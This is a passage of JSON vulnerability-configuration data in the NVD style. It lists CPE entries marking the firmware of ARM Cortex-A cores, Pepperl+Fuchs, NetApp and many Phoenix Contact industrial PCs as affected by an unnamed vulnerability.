          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a57_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a57:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a72_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a72:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a73_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a73:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a75_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a75:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arm:cortex-a76_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arm:cortex-a76:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:pepperl-fuchs:visunet_rm_shell:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:pepperl-fuchs:btc12_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:pepperl-fuchs:btc12:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:pepperl-fuchs:btc14_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:pepperl-fuchs:btc14:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc12_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc12_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_2001_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_2001:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_3001_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_3001:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_7001_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_7001:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_rackmount_2u_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_rackmount_2u:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_rackmount_4u_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_rackmount_4u:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc15_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc15_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc15m_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc15m_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc18.5m_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc18.5m_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc21.5m_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc21.5m_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000\\/wt_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000\\/wt:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000\\/m_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000\\/m:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:valueline_ipc_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:valueline_ipc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ppc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ppc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ppc_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ppc_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ipc_p7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ipc_p7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_2000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_2000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_3000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_3000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
